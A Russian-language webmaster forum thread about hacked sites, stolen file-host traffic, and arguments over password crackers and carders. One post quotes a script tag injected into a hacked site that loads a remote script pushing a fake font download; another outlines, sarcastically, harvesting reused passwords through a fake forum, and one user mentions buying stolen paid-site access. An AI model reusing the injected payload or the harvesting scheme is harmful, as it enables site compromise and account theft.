|
Вор ворует у вора и ещё символы
|
|
06.04.2017, 17:46
|
|
#31
|
Регистрация: 10.11.2012
Сообщений: 1,483
|
Сообщение от slavegirl
Столкнулась недавно с очень наглым и циничным способом воровства файлов
| Если пару дней идут одни доменные, то нужно обязательно стучать в поддержку ФО
Ошибки бывают, но они не носят систкматический характер, а вот если это вошло в систему, сравниваем ссылки. Ну а там кто на что горазд, если есть возможности... ("можно и по IP" вычислить ) Ну а потом бить, возможно даже ногами
|
|
|
06.04.2017, 17:53
|
|
#32
|
Регистрация: 10.11.2012
Сообщений: 1,483
|
Но у меня взломщик попался еще наглее, чем у Рабыни Этот взломал не только сайт, но и мою почту. Перешел в вебмастерскую гугла, изменил гео на Японию. Добавил себя админом на сайт и начал сливать трафик Долго это безобразие не продлилось, всего окола часа. Но сама наглость меня поразила до глубины души. Я захожу в панель гугла, а там радостная весть, у сайта появился еще один хозяин
|
|
|
06.04.2017, 19:12
|
|
#33
|
Регистрация: 10.06.2013
Сообщений: 136
|
У меня когда то на одном из сайтов к админке стоял стандартный пароль, который я использовал для регистрации на других сайтах, так кто то подобрал его, зашел в админку и поставил скрипт
<script src="http://34.208.136.102/update.js"></script>
Он делает отдельную страницу на главной сайта где пишет что хром не поддерживает шрифты сайта и предлагают скачать шрифт (понятно что это никакой не шрифт).
Этот скрипт я быстро убрал, но вот потом гугл отметил сайт как вредоносный и пришлось возится чтобы разблокировать его.
НИКОГДА не используйте один пароль для админки и регистрации на других сайтах.
|
|
|
10.04.2017, 20:34
|
|
#34
|
Регистрация: 16.09.2012
Сообщений: 4,810
|
Сообщение от Leatherdyke
Если пару дней идут одни доменные, то нужно обязательно стучать в поддержку ФО
| Это всё просто, когда в аккаунте подключены 1-2 сайта. А когда таких сайтов пара десятков, как мне уследить, что происходит на каждом из них? Особенно, если блог очень старый и на нём всегда всё стабильно работало...
Спрашивала у техподдержки, можно ли как-то забрать деньги у этого "везунчика" и передать их мне (хотя бы то, что он не успел ещё вывести), или в крайнем случае забанить его и дать мне его почту, чтобы я могла написать ему "пару ласковых". Сказали, что никаких правил он не нарушил и вся ответственность за безопасность моих сайтов лежит исключительно на мне. Всё, что они могут обеспечить, это сохранность моего аккаунта на HitFile и защиту от взлома, всё что за его пределами - на это они повлиять не в состоянии.
Блин, столько пунктов в этих правилах и не одного по моему случаю... Даже этот не подходит:
http://hitfile.net/rules/terms
Хорошо, что он ещё не догадался какой-нибудь анонимайзер для ссылок на javascript приделать, чтобы не отображались доменные продажи. Тогда бы я ещё полгода ни о чём бы не догадывалась. 100% какой-то неопытный новичок попался.
Сообщение от Leatherdyke
"можно и по IP" вычислить. Ну а потом бить, возможно даже ногами.
| Вот его IP-адреса (скорее всего, какой-нибудь немецкий VPN):
79.231.145.147
79.231.148.183
79.231.149.171
Можете проверить, не сканирует ли он и ваши блоги тоже.
|
|
|
10.04.2017, 23:09
|
|
#35
|
Регистрация: 26.02.2013
Сообщений: 1,729
|
Сообщение от slavegirl
дать мне его почту, чтобы я могла написать ему "пару ласковых"
| ох как его это расстроит
Сообщение от slavegirl
Хорошо, что он ещё не догадался какой-нибудь анонимайзер для ссылок на javascript приделать, чтобы не отображались доменные продажи. Тогда бы я ещё полгода ни о чём бы не догадывалась
| молодец, подсказала, теперь не просто догадывается, а знает
|
|
|
10.04.2017, 23:16
|
|
#36
|
Регистрация: 04.04.2012
Сообщений: 41
|
Сообщение от slavegirl
Админ моего сервера показал мне журналы попыток доступа, там куча вот таких записей по каждому из сайтов:
| сегодня это обычная история даже для сайтов не на вордпресе, редиректить wp-login и другие популярные для скана места на 404 html (или ещё куда подальше), не использовать для админа имя admin, не использовать плагины wordpress, не использовать wordpress...
а вообще парень хорош - очень аккуратный, школьника сразу бы стало заметно, дел наворотил-бы
он мог и не взламывать лично, а купить логи или доступ, видел подобные объявления, обычно для проставления вечных ссылок, слива трафика и т.п.
|
|
|
19.04.2017, 17:03
|
|
#37
|
Регистрация: 16.09.2012
Сообщений: 4,810
|
Сообщение от ID 185867
капец муславе, даже не знаю с чего начать, да и не надо... вы ноль целых, ноль десятых в парольщиках и как делают пассы к платнику, вы сами похоже не одного пасса не заказали у парольщиков... все познания о бруте у вас как у этого, которые кидал на мелочь и плодил мультиаки на серче, забыл его ник, вспомните не пишите здесь ибо это офтоп всё... без обид вы ноль-ноль-ноль в том о чем написали. и вы ноль как работают парольщики ибо такую шдяпу пишите аж смешно... брутфорс
| ID 185867, да мне уже объяснили только что в личке, каким образом вы воруете пароли. На самом деле очень примитивный и медленный способ, мы его в универе изучали по компьютерной безопасности:
Могу дать небольшую подсказку. Вместо того, чтобы сутками напролёт перебирать все возможные пароли (по словарю или без) на всяких Планетах и Интпорнах, тем самым блокируя работу постеров, которые не могут из-за вас залогиниться, можете сделать какой-нибудь публичный адалт-форум с открытой регистрацией и сохранять пользовательские данные в базе данных в незашифрованном виде.
Постеры сами предоставят нужные пароли и они в 99% случаев подойдут и к Планете, и к Интпорну и ещё к тысяче других форумов. У Вас будет примерно полгода-год, пока форум не заподозрят в фишинге и браузеры перестанут на него впускать.
Так что, скорее всего, это Вы "ноль-ноль-ноль" в том, что Вы написали. Но не обижайтесь, пожалуйста!
В то же время, крайне настоятельно рекомендую постерам использовать на разных форумах разные пароли, чтобы защититься от подобного вида угона аккаунтов.
|
|
|
19.04.2017, 17:19
|
|
#38
|
Регистрация: 10.03.2015
Сообщений: 863
|
Сообщение от slavegirl
ID 185867, да мне уже объяснили
| че объяснили? если о пассах к платникам и пассах к форумам, вообще используется разный софт и даже к форумам для каждого свой софт пишется, для платников (платных-п0рн0 сайтов) также у каждого свой софт и пишется он на заказ, услышала где-то чето, толком не знаешь ниче и давай умничать... купи хоть пару пассов себе на платник, пообщайся с паролеводами, может в общих чертах че узнаешь, хотя скорее всего паролевод пошлёт на три буквы с такими вопросами.
вы как ерема, ему про мешок, он про картошку... с чего базарга то начилась? с тогочто типа вот платники, кардеры... я вам сказал там в 99% обычным брутом обходятся для входа в мемберку, оставшийся 1% это не для меня... брут тоже бывает разный, софт тоже разный, способы тоже разные.
у вас в голове один брутофорс застрял, прога для школьников.
и я лично ниче не ворую, как вы пишите, я сам покупаю доступы на платники и акаунты на форумы, у разных людей... у вас даже в этом такая привычка проявить типа умничание, хотя вообще не в теме, что и как.
|
|
|
19.04.2017, 17:31
|
|
#39
|
Регистрация: 16.09.2012
Сообщений: 4,810
|
Сообщение от ID 185867
с тогочто типа вот платники, кардеры... я вам сказал там в 99% обычным брутом обходятся для входа в мемберку, оставшийся 1% это не для меня...
| ID 185867, ага. Убеждайте себя в этом и дальше. По статистике на первом месте у кардеров как раз продажа доступа к адалт-платникам:
https://books.google.com/books?id=zP...page&q&f=false
Сообщение от ID 185867
купи хоть пару пассов себе на платник, пообщайся с паролеводами, может в общих чертах че узнаешь
| Именно по вышеописанной причине я стараюсь и не связываться с подобным. Все подписки на платники я покупаю без помощи сомнительных посредников (так спится намного спокойнее).
|
|
|
19.04.2017, 17:47
|
|
#40
|
Регистрация: 10.03.2015
Сообщений: 863
|
Сообщение от slavegirl
По статистике на первом месте у кардеров как раз продажа доступа к адалт-платникам:
| кардеры ещё и ведут статистику? и кому они статистику докладывают? вам? МВД?
просто кардеры больше всего горят из-за мелочи и болтунов, так то это контигент очень не общительный и даже при бошьшом желании вы сто раз нарветесь на кидал, прежде чем найдете того, кого ищете... славе у вас че головка маковая? до вас не доходит , что тема каржа вообще сама по себе такая палевная, что о ней писать даже стороннему нубу лучше не надо, ибо привлечешь на себя интерес структур, а вы тут разорались о карже...
единственное что я вам говорю, что парольщики и люди делающие пассы на платники это не кардеры, ключевое слово подчеркну, делающие пассы на платники....
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0, гостей: 1)
|
|
|